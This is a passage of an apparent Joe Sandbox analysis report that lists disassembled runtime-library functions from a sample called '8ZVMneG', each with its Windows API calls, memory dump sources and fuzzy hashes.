                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: b099dfc10d6aaec8debd1d75341b10f70373ca6f794de095ab9198789673b5fb
                                                                                                                                                                                                                                                                  • Instruction ID: 90e39e8e6b02bb3fac337be7c7e33c1533d3ab0adf310fac8dd051c06f93781d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b099dfc10d6aaec8debd1d75341b10f70373ca6f794de095ab9198789673b5fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF05B31501124ABAB115E669E45F5A77D8DF817A4B287453A854F6391CE70D8038591
                                                                                                                                                                                                                                                                  Function 00ED7381 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00ED935A,?,?,00ED935A,00000220,?,00000001,?), ref: 00ED73B3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4ac2b7fe16e55e131cf236362bda1419a083c1e84f07e0b0d3ef94fbe03f6206
                                                                                                                                                                                                                                                                  • Instruction ID: d8757240f87db616a51bd365dc1bfe7d55f3085b4e678d14bab3c7db710b552c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac2b7fe16e55e131cf236362bda1419a083c1e84f07e0b0d3ef94fbe03f6206
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFE065311092129AE7212B669C01F5B3A88DF817A4F193163EC94B63D5FB61CC02A1A5

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 00EE29F2 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                  • Opcode ID: d3fede1bac23fcd1b1581a763edbdb5746355ae0ba756c3bd491edeb0966ed5f
                                                                                                                                                                                                                                                                  • Instruction ID: f7424cf5f9961e879d87b8fb9194e97ad041bfb4f41e69cdf1b06297a28b3905
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3fede1bac23fcd1b1581a763edbdb5746355ae0ba756c3bd491edeb0966ed5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60D23672E0826D8FDB65CE29DD447EAB7B5EB84304F1451EAD40DB7240EB78AE818F41
                                                                                                                                                                                                                                                                  Function 00EDCD76 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00EDC747,00000002,00000000,?,?,?,00EDC747,?,00000000), ref: 00EDCE0F
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00EDC747,00000002,00000000,?,?,?,00EDC747,?,00000000), ref: 00EDCE38
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00EDC747,?,00000000), ref: 00EDCE4D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                  • Opcode ID: 85cdf6e73df8426cd934c74b10adc2e5869525fb102f8901846c81ca49ff0266
                                                                                                                                                                                                                                                                  • Instruction ID: 3e3db180477ebd532755d5356b3e935188943930dda3020dc1153cde32ff80a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85cdf6e73df8426cd934c74b10adc2e5869525fb102f8901846c81ca49ff0266
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21F762600102AADB348F14CD00AA777A7EB44BD8B36A436E90AF7301E732CD03C390
                                                                                                                                                                                                                                                                  Function 00EDC611 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00EDC719
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00EDC757
                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00EDC76A
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EDC7B2
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EDC7CD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                                  • Opcode ID: d5ccbb6367beed15396ffab2ae78ff0e5baf3b05b6a035eabe9fff3c8b291b24
                                                                                                                                                                                                                                                                  • Instruction ID: 7aba14ac574993cee793873d06c4b11106c65c1915228e1f4004172d5d290cad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5ccbb6367beed15396ffab2ae78ff0e5baf3b05b6a035eabe9fff3c8b291b24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9513F7190020AAEDB10DFB5DC81ABA77B8EF48784F24646BA510F7291EB70D906CB61
                                                                                                                                                                                                                                                                  Function 00ED5790 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                                                                                                                                                                  • Instruction ID: 09fda980ce19e0da05365bc11833d5e890837992ee04c4460143fab019fd4883
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0021C72E016199BDF14CFA9C9906AEFBF1FF88314F24826AD519B7341D731A942CB90
                                                                                                                                                                                                                                                                  Function 00EDD358 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EDD448
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2655a04abeb1238d9858a7430c21b6b4079a8da99d729672b6a181db56a5f5eb
                                                                                                                                                                                                                                                                  • Instruction ID: 3cc6cf2523f0396996b775a28e6966f85090cdcf97480f84d741be84319d0e8a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2655a04abeb1238d9858a7430c21b6b4079a8da99d729672b6a181db56a5f5eb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0671E8719091589FDF25AF28DC89AFDBBB8EB05308F1451DAE049B7351EA318EC69F10
                                                                                                                                                                                                                                                                  Function 00ECB64C Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00ECB658
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00ECB724
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ECB73D
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00ECB747
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0d1e4f5e676aa93c5d199874a0d764a80a36ddaa4d3168867d905592d51ecce1
                                                                                                                                                                                                                                                                  • Instruction ID: dada10168f7464764bd1309d41c5e153df52ffc6ffdf986268c84e80e46c5ac7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d1e4f5e676aa93c5d199874a0d764a80a36ddaa4d3168867d905592d51ecce1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C831F975D053189BDF20DF65D94ABCDBBF8AF48304F1041AAE40CAB251EB719A85CF45
                                                                                                                                                                                                                                                                  Function 00ECC367 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00ECC379
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ECC388
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00ECC391
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00ECC39E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                  • Opcode ID: e3eaf246e4f0a7487de45c5edd894af5d60a4a2ae5d0c6f53d7a10c242ad238b
                                                                                                                                                                                                                                                                  • Instruction ID: 5a829d42e31b71b24c5fc16696df61cc0276c20d97b65258c2452c7a9562c0aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3eaf246e4f0a7487de45c5edd894af5d60a4a2ae5d0c6f53d7a10c242ad238b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF05F74D1120DEFCB04DBB5DA4999EBBF4FF9C204B914695A412F7111EA30AA48DF50
                                                                                                                                                                                                                                                                  Function 00EDC8FD Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC951
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC99B
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCA61
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1ad9af5bdbd4e36f74c96dedbda5f92b2d998e7f9f17bdc86c4ac65f5caf3497
                                                                                                                                                                                                                                                                  • Instruction ID: f9a1819ad761a302788edcf9261dc2c0974f9c8a3ec810c8cbfd208023dcaaca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ad9af5bdbd4e36f74c96dedbda5f92b2d998e7f9f17bdc86c4ac65f5caf3497
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F61A47151020B9FDB28DF25CD82BBAB7A8EF04384F20517BE906E6785E734D946DB50
                                                                                                                                                                                                                                                                  Function 00ED3C11 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00ED3D09
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00ED3D13
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00ED3D20
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: db233172ec044e9c787df611aa82f8e2d51eba38e79f8aa2b075c28c9bd4c0dd
                                                                                                                                                                                                                                                                  • Instruction ID: 62c0229834112e75b704aa95bf2316d96e60b2a9f26ee3ff81c5199b2fb4f8ad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db233172ec044e9c787df611aa82f8e2d51eba38e79f8aa2b075c28c9bd4c0dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB31D2749012289BCB21DF29DD89B9CBBB8BF48310F5055EAE40CA7251EB709F868F45
                                                                                                                                                                                                                                                                  Function 00EE0C16 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EE0B71,?,?,00000008,?,?,00EE700B,00000000), ref: 00EE0E43
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
